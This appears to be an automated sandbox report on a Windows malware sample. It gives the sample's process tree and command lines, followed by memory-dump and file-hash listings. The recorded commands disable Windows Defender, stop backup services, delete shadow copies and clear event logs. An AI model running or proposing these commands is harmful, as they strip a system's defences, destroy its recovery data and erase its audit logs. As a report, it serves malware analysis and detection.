PID 2632 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1276 wrote to memory of 1236 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1276 wrote to memory of 1236 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1276 wrote to memory of 1236 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2552 wrote to memory of 3692 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2552 wrote to memory of 3692 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2552 wrote to memory of 3692 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "vmicvss" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UnistoreSvc_1323b" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_1323b" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UnistoreSvc_1323b" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Files

memory/3796-115-0x0000000000000000-mapping.dmp

memory/3864-116-0x0000000000000000-mapping.dmp

memory/3360-117-0x0000000000000000-mapping.dmp

memory/512-118-0x0000000000000000-mapping.dmp

memory/800-119-0x0000000000000000-mapping.dmp

memory/2220-120-0x0000000000000000-mapping.dmp

memory/2812-121-0x0000000000000000-mapping.dmp

memory/788-122-0x0000000000000000-mapping.dmp

memory/3728-123-0x0000000000000000-mapping.dmp

memory/1460-124-0x0000000000000000-mapping.dmp

memory/3516-125-0x0000000000000000-mapping.dmp

memory/480-126-0x0000000000000000-mapping.dmp

memory/2824-127-0x0000000000000000-mapping.dmp

memory/1244-128-0x0000000000000000-mapping.dmp

memory/1276-129-0x0000000000000000-mapping.dmp

memory/1236-130-0x0000000000000000-mapping.dmp

memory/2552-131-0x0000000000000000-mapping.dmp

memory/3692-132-0x0000000000000000-mapping.dmp

memory/1668-133-0x0000000000000000-mapping.dmp

memory/404-134-0x0000000000000000-mapping.dmp

memory/808-135-0x0000000000000000-mapping.dmp

memory/2232-136-0x0000000000000000-mapping.dmp

memory/1332-137-0x0000000000000000-mapping.dmp

memory/1744-138-0x0000000000000000-mapping.dmp

memory/1784-139-0x0000000000000000-mapping.dmp

memory/2044-140-0x0000000000000000-mapping.dmp

memory/2156-141-0x0000000000000000-mapping.dmp

memory/2456-142-0x0000000000000000-mapping.dmp

memory/2936-143-0x0000000000000000-mapping.dmp

memory/3036-144-0x0000000000000000-mapping.dmp

memory/1496-145-0x0000000000000000-mapping.dmp

memory/848-146-0x0000000000000000-mapping.dmp

memory/2768-147-0x0000000000000000-mapping.dmp

memory/3672-148-0x0000000000000000-mapping.dmp

memory/3524-149-0x0000000000000000-mapping.dmp

memory/3664-150-0x0000000000000000-mapping.dmp

memory/1472-151-0x0000000000000000-mapping.dmp

memory/3876-152-0x0000000000000000-mapping.dmp

memory/1888-153-0x0000000000000000-mapping.dmp

memory/2640-154-0x0000000000000000-mapping.dmp

memory/1176-155-0x0000000000000000-mapping.dmp

memory/2684-156-0x0000000000000000-mapping.dmp

memory/2756-157-0x0000000000000000-mapping.dmp

memory/2088-158-0x0000000000000000-mapping.dmp

memory/3496-159-0x0000000000000000-mapping.dmp

memory/1316-160-0x0000000000000000-mapping.dmp

memory/3676-161-0x0000000000000000-mapping.dmp

memory/2572-162-0x0000000000000000-mapping.dmp

memory/868-163-0x0000000000000000-mapping.dmp

memory/3592-164-0x0000000000000000-mapping.dmp

memory/3488-165-0x0000000000000000-mapping.dmp

memory/1044-166-0x0000000000000000-mapping.dmp

memory/332-167-0x0000000000000000-mapping.dmp

memory/3996-168-0x0000000000000000-mapping.dmp

memory/2052-169-0x0000000000000000-mapping.dmp

memory/1844-170-0x0000000000000000-mapping.dmp

memory/1988-171-0x0000000000000000-mapping.dmp

memory/2944-172-0x0000000000000000-mapping.dmp

memory/3788-173-0x0000000000000000-mapping.dmp

memory/984-174-0x0000000000000000-mapping.dmp

memory/916-175-0x0000000000000000-mapping.dmp

memory/3148-176-0x0000000000000000-mapping.dmp

memory/3184-177-0x0000000000000000-mapping.dmp

memory/2084-178-0x0000000000000000-mapping.dmp

memory/2916-179-0x00000000034C0000-0x00000000034C1000-memory.dmp

memory/2916-180-0x00000000034C0000-0x00000000034C1000-memory.dmp

memory/2916-181-0x0000000004ED0000-0x0000000004F06000-memory.dmp

memory/2916-183-0x0000000004FA2000-0x0000000004FA3000-memory.dmp

memory/2916-182-0x0000000004FA0000-0x0000000004FA1000-memory.dmp

memory/2916-184-0x0000000007A90000-0x00000000080B8000-memory.dmp

memory/2916-185-0x0000000007940000-0x0000000007962000-memory.dmp

memory/2916-186-0x0000000008130000-0x0000000008196000-memory.dmp

memory/2916-187-0x0000000008280000-0x00000000082E6000-memory.dmp

memory/2916-188-0x0000000008320000-0x0000000008670000-memory.dmp

memory/2916-189-0x0000000008200000-0x000000000821C000-memory.dmp

memory/2916-190-0x0000000008730000-0x000000000877B000-memory.dmp

memory/2916-191-0x0000000008A50000-0x0000000008AC6000-memory.dmp

memory/2916-192-0x00000000034C0000-0x00000000034C1000-memory.dmp

memory/2916-200-0x0000000007A90000-0x00000000080B8000-memory.dmp

memory/2916-201-0x00000000098A0000-0x00000000098D3000-memory.dmp

memory/2916-202-0x00000000098A0000-0x00000000098D3000-memory.dmp

memory/2916-203-0x0000000007940000-0x0000000007962000-memory.dmp

memory/2916-204-0x0000000008130000-0x0000000008196000-memory.dmp

memory/2916-205-0x0000000008280000-0x00000000082E6000-memory.dmp

memory/2916-206-0x0000000008730000-0x000000000877B000-memory.dmp

memory/2916-207-0x0000000008A50000-0x0000000008AC6000-memory.dmp

memory/2916-208-0x0000000009880000-0x000000000989E000-memory.dmp

memory/2916-213-0x00000000099E0000-0x0000000009A85000-memory.dmp

memory/2916-214-0x000000007E630000-0x000000007E631000-memory.dmp

memory/2916-215-0x0000000009BA0000-0x0000000009C34000-memory.dmp

memory/2916-284-0x0000000004FA3000-0x0000000004FA4000-memory.dmp

memory/2916-409-0x00000000075E0000-0x00000000075FA000-memory.dmp

memory/2916-414-0x00000000075E0000-0x00000000075FA000-memory.dmp

memory/2916-415-0x00000000075D0000-0x00000000075D8000-memory.dmp

memory/2916-420-0x00000000075D0000-0x00000000075D8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

memory/3412-433-0x0000000004C60000-0x0000000004C96000-memory.dmp

memory/3412-434-0x0000000007960000-0x0000000007F88000-memory.dmp

memory/3412-435-0x00000000075A0000-0x00000000075C2000-memory.dmp

memory/3412-436-0x0000000007740000-0x00000000077A6000-memory.dmp

memory/3412-437-0x0000000007820000-0x0000000007886000-memory.dmp

memory/3412-438-0x0000000008170000-0x00000000084C0000-memory.dmp

memory/3412-439-0x0000000004D00000-0x0000000004D01000-memory.dmp

memory/3412-440-0x0000000004D02000-0x0000000004D03000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a787ec6fc0706bec7496dabdc62cc9b5
SHA1 31763f89f9b5b185d382422adf8d601403e58f79
SHA256 10e0355fbfa4da168a35a5254d9c78f8e7c47840e1fd05c326617eafd9f6becc
SHA512 30c69b6787dd6ce58ad84fce8ca9e6055fcebcb319bff37c1e3122457a8922b4129818bd88439f8a5c74e3304341d8818a91deef19b2ab085d6b9e8dec3febdf

memory/3412-442-0x00000000084C0000-0x00000000084DC000-memory.dmp

memory/3412-443-0x0000000008790000-0x00000000087DB000-memory.dmp

memory/3412-444-0x0000000008860000-0x00000000088D6000-memory.dmp

memory/3412-453-0x0000000007960000-0x0000000007F88000-memory.dmp

memory/3412-454-0x00000000098D0000-0x0000000009903000-memory.dmp

memory/3412-455-0x00000000098D0000-0x0000000009903000-memory.dmp

memory/3412-456-0x00000000075A0000-0x00000000075C2000-memory.dmp

memory/3412-457-0x0000000007740000-0x00000000077A6000-memory.dmp

memory/3412-458-0x0000000007820000-0x0000000007886000-memory.dmp

memory/3412-459-0x0000000008790000-0x00000000087DB000-memory.dmp

memory/3412-461-0x00000000098B0000-0x00000000098CE000-memory.dmp

memory/3412-460-0x0000000008860000-0x00000000088D6000-memory.dmp

memory/3412-466-0x0000000009910000-0x00000000099B5000-memory.dmp

memory/3412-468-0x0000000009BB0000-0x0000000009C44000-memory.dmp

memory/3412-469-0x0000000004D03000-0x0000000004D04000-memory.dmp

memory/3412-467-0x000000007EAF0000-0x000000007EAF1000-memory.dmp

memory/3412-662-0x0000000009B70000-0x0000000009B8A000-memory.dmp

memory/3412-667-0x0000000009B70000-0x0000000009B8A000-memory.dmp

memory/3412-668-0x0000000009B60000-0x0000000009B68000-memory.dmp

memory/3412-673-0x0000000009B60000-0x0000000009B68000-memory.dmp